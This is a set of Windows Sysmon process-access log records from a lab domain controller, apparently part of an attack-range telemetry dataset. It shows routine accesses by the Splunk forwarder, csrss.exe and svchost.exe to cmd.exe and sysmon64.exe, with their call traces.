{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3704,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-001032A10500}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-001032A10500}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3705,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-001032A10500}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-001032A10500}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3706,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3707,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3708,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3709,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3710,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3711,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
